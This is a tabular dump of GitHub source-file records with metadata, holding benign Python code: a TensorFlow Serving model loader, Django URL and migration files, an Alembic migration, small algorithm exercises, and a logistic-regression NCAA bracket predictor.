blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c09f88c25686fb1faac2e42d494e7f86ee7d7702
|
ae0c2806c009263fbd608b1381d96eb378ff115b
|
/aizynthfinder/utils/models.py
|
30f964dcb6fcb867dfd6a421ad9798c733115492
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
yinxx/aizynthfinder
|
45efcbafcf1d11199ec997129bc6a44ad4365952
|
20a7aed2db46e7df9dfeeaae0427f1e6e01b54e3
|
refs/heads/master
| 2023-06-25T00:21:36.983089
| 2021-07-26T08:52:47
| 2021-07-26T08:52:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,042
|
py
|
""" Module containing helper routines for using Keras and Tensorflow models
"""
from __future__ import annotations
import functools
import os
from typing import TYPE_CHECKING
import numpy as np
import requests
import grpc
import tensorflow as tf
from google.protobuf.json_format import MessageToDict
from tensorflow_serving.apis import (
predict_pb2,
get_model_metadata_pb2,
prediction_service_pb2_grpc,
)
from tensorflow.keras.metrics import top_k_categorical_accuracy
from tensorflow.keras.models import load_model as load_keras_model
from aizynthfinder.utils.logging import logger
from aizynthfinder.utils.exceptions import ExternalModelAPIError
if TYPE_CHECKING:
from aizynthfinder.utils.type_utils import Any, Union, Callable, List
_ModelInput = Union[np.ndarray, List[np.ndarray]]
top10_acc = functools.partial(top_k_categorical_accuracy, k=10)
top10_acc.__name__ = "top10_acc" # type: ignore
top50_acc = functools.partial(top_k_categorical_accuracy, k=50)
top50_acc.__name__ = "top50_acc" # type: ignore
CUSTOM_OBJECTS = {"top10_acc": top10_acc, "top50_acc": top50_acc, "tf": tf}
_logger = logger()
TF_SERVING_HOST = os.environ.get("TF_SERVING_HOST")
TF_SERVING_REST_PORT = os.environ.get("TF_SERVING_REST_PORT")
TF_SERVING_GRPC_PORT = os.environ.get("TF_SERVING_GRPC_PORT")
def load_model(
source: str, key: str, use_remote_models: bool
) -> Union["LocalKerasModel", "ExternalModelViaGRPC", "ExternalModelViaREST"]:
"""
Load model from a configuration specification.
If `use_remote_models` is True, tries to load:
1. A Tensorflow server through gRPC
2. A Tensorflow server through REST API
3. A local model
otherwise it just loads the local model
:param source: if fallbacks to a local model, this is the filename
:param key: when connecting to Tensrflow server this is the model name
:param use_remote_models: if True will try to connect to remote model server
:return: a model object with a predict object
"""
if not use_remote_models:
return LocalKerasModel(source)
try:
return ExternalModelViaGRPC(key)
except ExternalModelAPIError:
pass
try:
return ExternalModelViaREST(key)
except ExternalModelAPIError:
pass
return LocalKerasModel(source)
class LocalKerasModel:
"""
A keras policy model that is executed locally.
The size of the input vector can be determined with the len() method.
:ivar model: the compiled model
:ivar output_size: the length of the output vector
:param filename: the path to a Keras checkpoint file
"""
def __init__(self, filename: str) -> None:
self.model = load_keras_model(filename, custom_objects=CUSTOM_OBJECTS)
try:
self._model_dimensions = int(self.model.input.shape[1])
except AttributeError:
self._model_dimensions = int(self.model.input[0].shape[1])
self.output_size = int(self.model.output.shape[1])
def __len__(self) -> int:
return self._model_dimensions
def predict(self, input_: _ModelInput) -> np.ndarray:
"""
Perform a forward pass of the neural network.
:param input_: the input vector
:return: the vector of the output layer
"""
return self.model.predict(input_)
def _log_and_reraise_exceptions(method: Callable) -> Callable:
@functools.wraps(method)
def wrapper(*args, **kwargs):
try:
return method(*args, **kwargs)
except Exception as err:
msg = "Error when requesting from tensorflow model API"
_logger.error("%s: %s", msg, err)
raise ExternalModelAPIError(msg)
return wrapper
class ExternalModelViaREST:
"""
A neural network model implementation using TF Serving via REST API.
:param name: the name of model
"""
def __init__(self, name: str) -> None:
self._model_url = self._get_model_url(name)
self._sig_def = self._get_sig_def()
def __len__(self) -> int:
first_input_name = list(self._sig_def["inputs"].keys())[0]
return int(
self._sig_def["inputs"][first_input_name]["tensor_shape"]["dim"][1]["size"]
)
def predict(self, inputs: _ModelInput) -> np.ndarray:
"""
Get prediction from model.
:param inputs: the input vector or list of vectors
:return: the vector of the output layer
"""
url = self._model_url + ":predict"
res = self._handle_rest_api_request(
"POST", url, json=self._make_payload(inputs)
)
return np.asarray(res["outputs"])
def _get_sig_def(self) -> dict:
res = self._handle_rest_api_request("GET", self._model_url + "/metadata")
return res["metadata"]["signature_def"]["signature_def"]["serving_default"]
# pylint: disable=no-self-use
@_log_and_reraise_exceptions
def _handle_rest_api_request(
self, method: str, url: str, *args: Any, **kwargs: Any
) -> dict:
res = requests.request(method, url, *args, **kwargs)
if res.status_code != 200 or (
res.headers["Content-Type"] != "application/json"
):
raise ExternalModelAPIError(
f"Unexpected response from REST API: {res.status_code}\n{res.text}"
)
return res.json()
def _make_payload(self, inputs: _ModelInput) -> dict:
if isinstance(inputs, np.ndarray):
inputs = [inputs]
data = {
name: fp.tolist()
for name, fp in zip(self._sig_def["inputs"].keys(), inputs)
}
return {"inputs": data}
@staticmethod
def _get_model_url(name: str) -> str:
warning = f"Failed to get url of REST service for external model {name}"
if not TF_SERVING_HOST:
_logger.warning(warning)
raise ExternalModelAPIError("Host not set for model {name}")
if not TF_SERVING_REST_PORT:
_logger.warning(warning)
raise ExternalModelAPIError("REST port not set for model {name}")
return f"http://{TF_SERVING_HOST}:{TF_SERVING_REST_PORT}/v1/models/{name}"
class ExternalModelViaGRPC:
"""
A neural network model implementation using TF Serving via gRPC.
:param name: the name of model
"""
def __init__(self, name: str) -> None:
self._server = self._get_server(name)
self._model_name = name
self._sig_def = self._get_sig_def()
def __len__(self) -> int:
first_input_name = list(self._sig_def["inputs"].keys())[0]
return int(
self._sig_def["inputs"][first_input_name]["tensorShape"]["dim"][1]["size"]
)
@_log_and_reraise_exceptions
def predict(self, inputs: _ModelInput) -> np.ndarray:
"""
Get prediction from model.
:param inputs: the input vector or list of vectors
:return: the vector of the output layer
"""
input_tensors = self._make_payload(inputs)
channel = grpc.insecure_channel(self._server)
service = prediction_service_pb2_grpc.PredictionServiceStub(channel)
request = predict_pb2.PredictRequest()
request.model_spec.name = self._model_name
for name, tensor in input_tensors.items():
request.inputs[name].CopyFrom(tensor)
key = list(self._sig_def["outputs"].keys())[0]
return tf.make_ndarray(service.Predict(request, 10.0).outputs[key])
@_log_and_reraise_exceptions
def _get_sig_def(self) -> dict:
channel = grpc.insecure_channel(self._server)
service = prediction_service_pb2_grpc.PredictionServiceStub(channel)
request = get_model_metadata_pb2.GetModelMetadataRequest()
request.model_spec.name = self._model_name
request.metadata_field.append("signature_def")
result = MessageToDict(service.GetModelMetadata(request, 10.0))
# close the channel so that it won't be reused after fork and fail
channel.close()
return result["metadata"]["signature_def"]["signatureDef"]["serving_default"]
def _make_payload(self, inputs: _ModelInput) -> dict:
if isinstance(inputs, np.ndarray):
inputs = [inputs]
tensors = {}
for name, fp_ in zip(self._sig_def["inputs"].keys(), inputs):
size = int(self._sig_def["inputs"][name]["tensorShape"]["dim"][1]["size"])
tensors[name] = tf.make_tensor_proto(fp_, dtype=np.float32, shape=(1, size))
return tensors
@staticmethod
def _get_server(name: str) -> str:
warning = f"Failed to get gRPC server for external model {name}"
if not TF_SERVING_HOST:
_logger.warning(warning)
raise ExternalModelAPIError(f"Host not set for model {name}")
if not TF_SERVING_GRPC_PORT:
_logger.warning(warning)
raise ExternalModelAPIError(f"GRPC port not set for model {name}")
return f"{TF_SERVING_HOST}:{TF_SERVING_GRPC_PORT}"
|
[
"samuel.genheden@gmail.com"
] |
samuel.genheden@gmail.com
|
93f4ab82289a1cae7bd28c9673a3261468fa1ea4
|
bf1cf014b2965fb8d38f7a58cc812dcd65719ed9
|
/Other/bfs.py
|
5b6e888e47f512b80377dd550e7902822ea62a5c
|
[] |
no_license
|
imthefrizzlefry/PythonPractice
|
c07408592b0f5234217ec448cd2b81415332afbc
|
954a25e77435d97a1a0f12c38568ee68686e6960
|
refs/heads/master
| 2021-02-20T16:23:56.483052
| 2020-06-13T08:08:54
| 2020-06-13T08:08:54
| 245,341,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
def BFS(s, Adj):
level = {s:0}
parent = {s:None}
i=1
frontier = [s]
while frontier:
next=[]
for u in frontier:
for v in Adj[u]:
if v not in level:
level[v] = i
parent[v] = u
next.append(v)
frontier = next
i += 1
|
[
"imthefrizzlefry@gmail.com"
] |
imthefrizzlefry@gmail.com
|
aa15d2821db84d76f0d3d14f1a925ab2dafb08e2
|
ad5b54e8578a85270035fc4020a1c143f040bc88
|
/accounts/urls.py
|
8400662b63951436769a75eb44404dfd475df9af
|
[] |
no_license
|
7990satyam200/flickclone
|
18c6e181bc9daaaea0f75e7f6838df3e99d818be
|
0e461030e55c445b27dcc9216af9a0941266fcb2
|
refs/heads/master
| 2022-12-09T08:02:07.814093
| 2020-07-22T14:06:38
| 2020-07-22T14:06:38
| 142,027,713
| 0
| 0
| null | 2022-09-23T22:30:00
| 2018-07-23T14:43:40
|
CSS
|
UTF-8
|
Python
| false
| false
| 571
|
py
|
from django.urls import path, include
from .views import profile, signup, myhome
from django.contrib.auth import views
urlpatterns = [
#path('signup', user_creation, name = 'signup'),
path('signup', signup, name = 'signup'),
path('', myhome, name= 'home'),
#path('register', register, name= 'register' ),
path('profile', profile, name = 'profile'),
path('login', views.LoginView.as_view(), name = 'login'),
path('oauth/', include('social_django.urls', namespace='social')),
path('logout/', views.LogoutView.as_view(), name='logout' ),
]
|
[
"satyammishrastanford@gmail.com"
] |
satyammishrastanford@gmail.com
|
680c9979e7e3ba578be70bbc89a825ccf18bbc4b
|
770989d54a53a431a9fc7b5d292c109e534176ac
|
/InterviewQ/reverseNum.py
|
a351afdca76f79380bb8be1c0364a3358abc1a5e
|
[] |
no_license
|
pawansingh10/PracticeDemo
|
7d21c9cd2007213b25ae972f22cfa08cf8ccaa40
|
ea6a74c12ea5964a04ceffaa2976638b4cf82a70
|
refs/heads/master
| 2022-12-09T15:31:05.428684
| 2020-09-02T11:00:28
| 2020-09-02T11:00:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
def reverse(n):
temp=n
reverse=0
while n>0:
rem=n%10
reverse=(reverse*10)+rem
n=n//10
return f'Reverse of {temp} is {reverse}'
n=int(input("Enter a num:"))
print(reverse(n))
|
[
"pawansinghkk109@gmail.com"
] |
pawansinghkk109@gmail.com
|
0821372ed21e443f9b92543cf15566b5b9260d3d
|
3c24d61873e985e0979b7c43e979f03f8122eb61
|
/ControlPanel/migrations/0002_auto_20171023_0906.py
|
fada7f7052571621d3db3207ce134fecee265d46
|
[] |
no_license
|
Mansuete/Rozklad
|
83209bc9dc16f95a95bfbaf438004732326d558a
|
300fa33939a1c26eb1f063c2f00fded9bca0a944
|
refs/heads/master
| 2021-08-10T15:09:59.062022
| 2017-11-12T18:21:26
| 2017-11-12T18:21:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,273
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-10-23 06:06
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ControlPanel', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='DayInGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('day_name', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ControlPanel.Day')),
('group_name', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ControlPanel.Group')),
],
options={
'verbose_name': 'День навчання в групі',
'verbose_name_plural': 'Дні навчання в групах',
},
),
migrations.RenameModel(
old_name='Lesson',
new_name='LessonName',
),
]
|
[
"mansuete98@gmail.com"
] |
mansuete98@gmail.com
|
771c4877e1e56e8d4e5f76036070730611638a89
|
59d4f15f524bf7942691ce535bab896001bd6d88
|
/src/sw/allotmentclub/alembic/versions/add_ah_signature_e2cfe9da21cf.py
|
b0ac2dcc31778b36bc4cd79f5b46d1d011f49b60
|
[
"ZPL-2.1",
"MIT"
] |
permissive
|
sweh/sw.allotmentclub.backend
|
93dfc667799a3dd7dd7cfcccb175cf61cb94721d
|
eb7f108e9e5d36b59e771cce105c3a68e421a90b
|
refs/heads/master
| 2023-08-05T02:36:06.186518
| 2023-07-30T11:57:28
| 2023-07-30T11:57:28
| 121,388,106
| 2
| 0
|
NOASSERTION
| 2023-06-30T22:26:17
| 2018-02-13T13:51:22
|
Python
|
UTF-8
|
Python
| false
| false
| 765
|
py
|
"""Add ah signature
Revision ID: e2cfe9da21cf
Revises: 897a3181401e
Create Date: 2020-10-15 07:20:57.570537
"""
from alembic import op
import base64
import pkg_resources
# revision identifiers, used by Alembic.
revision = 'e2cfe9da21cf'
down_revision = '897a3181401e'
def upgrade():
signature = base64.b64encode(
pkg_resources.resource_stream(
'sw.allotmentclub.signatures', 'ah.png').read()
).decode()
signature = f'data:application/png;base64,{signature}'
op.execute(f"""UPDATE public.user SET
signature = '{signature}'
WHERE username = 'ah';""")
def downgrade():
op.execute("""UPDATE public.user SET
signature = ''
WHERE username = 'ah';""")
|
[
"sebastian@wehrmann.de"
] |
sebastian@wehrmann.de
|
93eebe7837cbbf5e07c5ae15e3fc60d134c2473b
|
0649b9aad2cc17e2e535795732ab5adb891401c2
|
/src/landmarks/models.py
|
4c526a7db2fceccadb5ad3544b712cff509f6a1d
|
[] |
no_license
|
abdallahokasha/django-demo
|
501ee66ff39db03571488a74a8f556088e1f4f53
|
0485e7b55bbe5bbacf258b1aabd2a2bb222052f5
|
refs/heads/master
| 2021-06-11T15:53:58.912483
| 2020-06-20T10:03:39
| 2020-06-20T10:03:39
| 143,612,888
| 0
| 0
| null | 2021-06-10T20:43:41
| 2018-08-05T12:56:53
|
Python
|
UTF-8
|
Python
| false
| false
| 663
|
py
|
from __future__ import unicode_literals
from django.db import models
from django_countries.fields import CountryField
# Create your models here.
class Landmark(models.Model):
title = models.CharField(max_length=50, unique=True)
description = models.TextField(max_length=500)
country = CountryField()
latitude = models.FloatField(default="30.044281")
longitude = models.FloatField(default="31.340002")
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True, auto_now_add=False)
def __unicode__(self):
return self.title
def __str__(self):
return self.title
|
[
"abdookasha56@gmail.com"
] |
abdookasha56@gmail.com
|
5409791ba70015c93c1ee6d56aeb7b933d972ae7
|
8edc5c687d8c18951f770d4d5debd1324d28c06d
|
/archive/logistic_regression.py
|
a1bafe0ea7247884c77a9e0de10cc18439d86768
|
[] |
no_license
|
geerc/bracketlytics
|
cac14ea3fef921f9ad254c942312852565784ef6
|
2a0253a90763f1164e241f8b49a6f2f8dd5ab0de
|
refs/heads/master
| 2021-06-10T04:02:19.615815
| 2021-04-06T14:19:19
| 2021-04-06T14:19:19
| 152,919,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,040
|
py
|
import numpy as np
import pandas as pd
import seaborn as sb
import functions
from queue import *
from pandas import Series, DataFrame
from pylab import rcParams
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.metrics import classification_report
round1 = Queue()
round2 = Queue()
round3 = Queue()
round4 = Queue()
round5 = Queue()
round6 = Queue()
round7 = Queue()
ROOT = '/Users/christiangeer/bracketlytics'
game_data = pd.read_csv(ROOT + '/data/2018TeamStats_Final.csv')
season_stats = pd.read_csv(ROOT + '/data/kaggle_data/season_data.csv')
sos = pd.read_csv(ROOT + '/data/sos.csv')
# Remove unnecassary columns
game_data.drop(labels=['gameid','Opp PTS','PF','Opp PF','Rank','MP','FG%','2P','2PA','2P%','3PA','3P%','FT%','TRB','AST','STL','BLK','PTS','Opp FG%','Opp 2P','Opp 2PA','Opp 2P%','Opp 3PA','Opp 3P%','Opp FT%','Opp TRB','Opp AST','Opp STL','Opp BLK'], inplace=True, axis=1)
season_stats.drop(labels=['X.11','X.10','X.9','X.8','X.7','X.6','X.5','X.4','X.3','X.2','X.1','X','Rank','SOS'], inplace=True, axis=1)
sos.drop(labels=['Unnamed: 0','X.11','X.10','X.9','X.8','X.7','X.6','X.5','X.4','X.3','X.2','X.1','X','Rank'], inplace=True, axis=1)
# print(sos)
# sos['SOS'] = sos['SOS'] + 12.48
# sos.sort_values(by=['SOS'])
# Set team as index
season_stats.set_index('Team', inplace=True)
sos.set_index('Team', inplace=True)
# Convert to lower case
sos.index = sos.index.str.lower()
# Convert stat variables to numeric
game_data['FG'] = game_data['FG'].apply(pd.to_numeric, errors='coerce')
game_data['FGA'] = game_data['FGA'].apply(pd.to_numeric, errors='coerce')
game_data['3P'] = game_data['3P'].apply(pd.to_numeric, errors='coerce')
game_data['FT'] = game_data['FT'].apply(pd.to_numeric, errors='coerce')
game_data['FTA'] = game_data['FTA'].apply(pd.to_numeric, errors='coerce')
game_data['ORB'] = game_data['ORB'].apply(pd.to_numeric, errors='coerce')
game_data['DRB'] = game_data['DRB'].apply(pd.to_numeric, errors='coerce')
game_data['TOV'] = game_data['TOV'].apply(pd.to_numeric, errors='coerce')
game_data['Win?'] = game_data['Win?'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FG'] = game_data['Opp FG'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FGA'] = game_data['Opp FGA'].apply(pd.to_numeric, errors='coerce')
game_data['Opp 3P'] = game_data['Opp 3P'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FT'] = game_data['Opp FT'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FTA'] = game_data['Opp FTA'].apply(pd.to_numeric, errors='coerce')
game_data['Opp ORB'] = game_data['Opp ORB'].apply(pd.to_numeric, errors='coerce')
game_data['Opp DRB'] = game_data['Opp DRB'].apply(pd.to_numeric, errors='coerce')
game_data['Opp TOV'] = game_data['Opp TOV'].apply(pd.to_numeric, errors='coerce')
functions.create_stats(game_data)
functions.create_stats(season_stats)
# Drop unnecassary columns
game_data.drop(labels=['FG','FGA','3P','FT','FTA','ORB','DRB','TOV','Opp FG','Opp FGA','Opp 3P','Opp FT','Opp FTA','Opp ORB','Opp DRB','Opp TOV'], inplace=True, axis=1)
season_stats.drop(labels=['Unnamed: 0','FG','3P','FGA','FT','FTA','ORB','DRB','TOV','Opp FG','Opp FGA','Opp 3P','Opp FT','Opp FTA','Opp ORB','Opp DRB','Opp TOV'], inplace=True, axis=1)
X = game_data.iloc[:,2:10].values
y = game_data.iloc[:,1].values
# Create training and testing vars
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = .3, random_state=25)
X_train = pd.DataFrame(X)
y_train = pd.DataFrame(y)
# Remove na values
X_train = X_train.dropna(axis=0, how='all')
y_train = y_train.drop(y_train.index[5282])
# Create and fit the regression
LogReg = LogisticRegression()
LogReg.fit(X_train, y_train)
result = LogReg.score(X_test, y_test)
print("Accuracy: %.2f%%" % (result*100.0))
# from sklearn.metrics import confusion_matrix
# confusion_matrix = confusion_matrix(y_test, y_pred)
# print('Confusion Matrix: \n', confusion_matrix)
#
# print(classification_report(y_test, y_pred))
# function predict the probabilites of each team winning, and return the higher team
def predict_game(high_seed, low_seed):
high_seed = 'auburn'
low_seed = 'kansas'
if high_seed != 1 and low_seed != 1:
# Get stats for two teams playing
team1a = season_stats.loc[high_seed]
team1a = team1a.loc[['eFG%','TOVp','ORBp','FTp']]
team2a = season_stats.loc[low_seed]
team2a = team2a.loc[['eFG%','TOVp','ORBp','FTp']]
team2a = team2a.rename({'eFG%':'Opp_eFG%', 'TOVp':'Opp_TOVp', 'ORBp':'Opp_ORBp', 'FTp':'Opp_FTp'})
team1b = season_stats.loc[low_seed]
team1b = team1b.loc[['eFG%','TOVp','ORBp','FTp']]
team2b = season_stats.loc[high_seed]
team2b = team2b.loc[['eFG%','TOVp','ORBp','FTp']]
team2b = team2b.rename({'eFG%':'Opp_eFG%', 'TOVp':'Opp_TOVp', 'ORBp':'Opp_ORBp', 'FTp':'Opp_FTp'})
# Create game from perspective of both teams
game_a = team2a.append(team1a)
game_b = team1b.append(team2b)
# Change series to dataframe so that it can be fed into the model
game = DataFrame(dict(s1 = game_a, s2 = game_b))
# Transpose df and rename indices
game = game.T
game = game.rename({'s1': high_seed, 's2': low_seed}, axis='index')
# Predict probablies of winning
y_pred_prob = LogReg.predict_proba(game)
# Select just each teams probabilites of winning
team1 = y_pred_prob[0, 0]
team2 = y_pred_prob[1, 0]
type(team1)
# Create strength of schedule
high_seed_sos = sos.loc[high_seed].iloc[0]
low_seed_sos = sos.loc[low_seed].iloc[0]
type(high_seed_sos)
type(low_seed_sos)
# Determine winner
if team1 * high_seed_sos > team2 * low_seed_sos:
winner = high_seed
elif team2 * low_seed_sos > team1 * high_seed_sos:
winner = low_seed
return(winner)
# print(winner)
elif high_seed == 1:
return low_seed
# print(low_seed)
elif low_seed == 1:
return high_seed
# print(high_seed)
# Function to move winning team to next round
def advance_team(winner, round):
print(winner)
round.put(winner)
def create_bracket(round1):
# South Region
try:
round1.put('virginia')
except KeyError:
round1.put(1)
try:
round1.put('maryland-baltimore-county')
except KeyError:
round1.put(1)
try:
round1.put('creighton')
except KeyError:
round1.put(1)
try:
round1.put('kansas-state')
except KeyError:
round1.put(1)
try:
round1.put('kentucky')
except KeyError:
round1.put(1)
try:
round1.put('davidson')
except KeyError:
round1.put(1)
try:
round1.put('arizona')
except KeyError:
round1.put(1)
try:
round1.put('buffalo')
except KeyError:
round1.put(1)
try:
round1.put('miami-fl')
except KeyError:
round1.put(1)
try:
round1.put('loyola-il')
except KeyError:
round1.put(1)
try:
round1.put('tennessee')
except KeyError:
round1.put(1)
try:
round1.put('wright-state')
except KeyError:
round1.put(1)
try:
round1.put('nevada')
except KeyError:
round1.put(1)
try:
round1.put('texas')
except KeyError:
round1.put(1)
try:
round1.put('cincinnati')
except KeyError:
round1.put(1)
try:
round1.put('georgia-state')
except KeyError:
round1.put(1)
# West Region
try:
round1.put('xavier')
except KeyError:
round1.put(1)
try:
round1.put('texas-southern')
except KeyError:
round1.put(1)
try:
round1.put('missouri')
except KeyError:
round1.put(1)
try:
round1.put('florida-state')
except KeyError:
round1.put(1)
try:
round1.put('ohio-state')
except KeyError:
round1.put(1)
try:
round1.put('south-dakota-state')
except KeyError:
round1.put(1)
try:
round1.put('gonzaga')
except KeyError:
round1.put(1)
try:
round1.put('north-carolina-greensboro')
except KeyError:
round1.put(1)
try:
round1.put('houston')
except KeyError:
round1.put(1)
try:
round1.put('san-diego-state')
except KeyError:
round1.put(1)
try:
round1.put('michigan')
except KeyError:
round1.put(1)
try:
round1.put('montana')
except KeyError:
round1.put(1)
try:
round1.put('texas-am')
except KeyError:
round1.put(1)
try:
round1.put('providence')
except KeyError:
round1.put(1)
try:
round1.put('north-carolina')
except KeyError:
round1.put(1)
try:
round1.put('lipscomb')
except KeyError:
round1.put(1)
# East region
try:
round1.put('villanova')
except KeyError:
round1.put(1)
try:
round1.put('radford')
except KeyError:
round1.put(1)
try:
round1.put('virginia-tech')
except KeyError:
round1.put(1)
try:
round1.put('alabama')
except KeyError:
round1.put(1)
try:
round1.put('west-virginia')
except KeyError:
round1.put(1)
try:
round1.put('murray-state')
except KeyError:
round1.put(1)
try:
round1.put('wichita-state')
except KeyError:
round1.put(1)
try:
round1.put('marshall')
except KeyError:
round1.put(1)
try:
round1.put('florida')
except KeyError:
round1.put(1)
try:
round1.put('st-bonaventure')
except KeyError:
round1.put(1)
try:
round1.put('texas-tech')
except KeyError:
round1.put(1)
try:
round1.put(1)
except KeyError:
round1.put(1)
try:
round1.put('arkansas')
except KeyError:
round1 .put(1)
try:
round1.put('butler')
except KeyError:
round1.put(1)
try:
round1.put('purdue')
except KeyError:
round1.put(1)
try:
round1.put('cal-state-fullerton')
except KeyError:
round1.put(1)
# Midwest region
try:
round1.put('kansas')
except KeyError:
round1.put(1)
try:
round1.put('pennsylvania')
except KeyError:
round1.put(1)
try:
round1.put('seton-hall')
except KeyError:
round1.put(1)
try:
round1.put('north-carolina-state')
except KeyError:
round1.put(1)
try:
round1.put('clemson')
except KeyError:
round1.put(1)
try:
round1.put('new-mexico-state')
except KeyError:
round1.put(1)
try:
round1.put('auburn')
except KeyError:
round1.put(1)
try:
round1.put('college-of-charleston')
except KeyError:
round1.put(1)
try:
round1.put('texas-christian')
except KeyError:
round1.put(1)
try:
round1.put('syracuse')
except KeyError:
round1.put(1)
try:
round1.put('michigan-state')
except KeyError:
round1.put(1)
try:
round1.put('bucknell')
except KeyError:
round1.put(1)
try:
round1.put('rhode-island')
except KeyError:
round1.put(1)
try:
round1.put('oklahoma')
except KeyError:
round1.put(1)
try:
round1.put('duke')
except KeyError:
round1.put(1)
try:
round1.put('iona')
except KeyError:
round1.put(1)
return round1
round1 = create_bracket(round1)
# Round 1 games
n = 0
print("\nAdvance to round of 32:")
while n < 32:
high_seed = round1.get()
low_seed = round1.get()
advance_team(predict_game(high_seed, low_seed), round2)
n += 1
# Round 2 games
n = 0
print("\nAdvance to Sweet 16:")
while n < 16:
high_seed = round2.get()
low_seed = round2.get()
advance_team(predict_game(high_seed, low_seed), round3)
n += 1
# Round 3 games
n = 0
print("\nAdvance to Elite 8:")
while n < 8:
high_seed = round3.get()
low_seed = round3.get()
advance_team(predict_game(high_seed, low_seed), round4)
n += 1
# Round 4 games
n = 0
print("\nAdvance to Final 4:")
while n < 4:
high_seed = round4.get()
low_seed = round4.get()
advance_team(predict_game(high_seed, low_seed), round5)
n += 1
# Round 5 games
n = 0
print("\nAdvance to Championship game:")
while n < 2:
high_seed = round5.get()
low_seed = round5.get()
advance_team(predict_game(high_seed, low_seed), round6)
n += 1
# Championship
n = 0
print("\nChampion:")
high_seed = round6.get()
low_seed = round6.get()
advance_team(predict_game(high_seed, low_seed), round7)
|
[
"geerc@allegheny.edu"
] |
geerc@allegheny.edu
|
91639f4cb58fb98baf23043a134799e43c477abe
|
07dd30282dfebd49f085aa9a1ef8eec86249fc13
|
/Recruitment/apps/home/migrations/0012_company_companyemail.py
|
d4436a09ca72072a5ef499ddd6af784d7e1f5efb
|
[] |
no_license
|
tkhto/Recruitment
|
4af6e1cf3668e10deb9c714ac6b25440ac007182
|
8e551d417b6ba0143bd9636a85ea46ebaba944f4
|
refs/heads/master
| 2021-05-25T07:55:54.023581
| 2020-04-01T08:51:45
| 2020-04-01T08:51:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
# Generated by Django 2.2.8 on 2020-03-25 12:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0011_banners'),
]
operations = [
migrations.AddField(
model_name='company',
name='companyEmail',
field=models.TextField(default='12345@aa.com', verbose_name='企业邮箱列表'),
preserve_default=False,
),
]
|
[
"11789014@qq.com"
] |
11789014@qq.com
|
2e0ccc75e8c2d4ee4a8d8c0cbb29d30c6e44106e
|
bdd7779b8fd15e96ed09111843e3f202108b78fd
|
/cos1.py
|
e12c34abc8d6e5f995c2b104df912270bdd3a28f
|
[] |
no_license
|
s22624-pjwstk/konsulatacje
|
aa63216e96e5cfa1a25ab27853cad2920ab8b1f9
|
8742f806d8ca8413a4a833017cdcfc1ef436e78a
|
refs/heads/main
| 2023-03-27T07:04:18.569441
| 2021-03-30T19:41:54
| 2021-03-30T19:41:54
| 353,121,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 642
|
py
|
def cos(x):
print(x)
cos(2)
def zewnetrzna(a):
def wewnetrzna():
print(a)
wewnetrzna()
zewnetrzna(3)
def operator(s):
def plus(a,b):
return a+b
def minus(a,b):
return a-b
if s=="+":
return plus
elif s=="-":
return minus
o=operator("+")
print(o)
print(o(2,3))
def add(n):
def add_imple(x):
return n+x
return add_imple
print(add(1)(2))
def mr(fn):
def jakkolwiek(s):
s="mr {}".format(s)
return fn(s)
return jakkolwiek
@mr
def hello(s):
return "hello {}".format(s)
print(hello("Darek"))
|
[
"noreply@github.com"
] |
noreply@github.com
|
16e59e20f7df9e8f624ab2a4d96bc91cbdf7ad6f
|
b5b3c006a6dcd607df2546d30e7789225b3699c7
|
/optionstrading/nysedump100.py
|
de79ccafaaa0526537bad3580ba41b2c2a946ab5
|
[] |
no_license
|
webclinic017/mypython
|
df3467f6d977f75640f68d7ccdf33c5772632b31
|
2bddc5ad8201a5a9fd962409b83a6dd20de67aea
|
refs/heads/master
| 2023-02-05T03:56:05.240956
| 2020-12-31T06:09:45
| 2020-12-31T06:09:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,369
|
py
|
import numpy as np
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
import basictools as bt
import pandas_datareader as pdr
import yfinance as yf
import os
import time
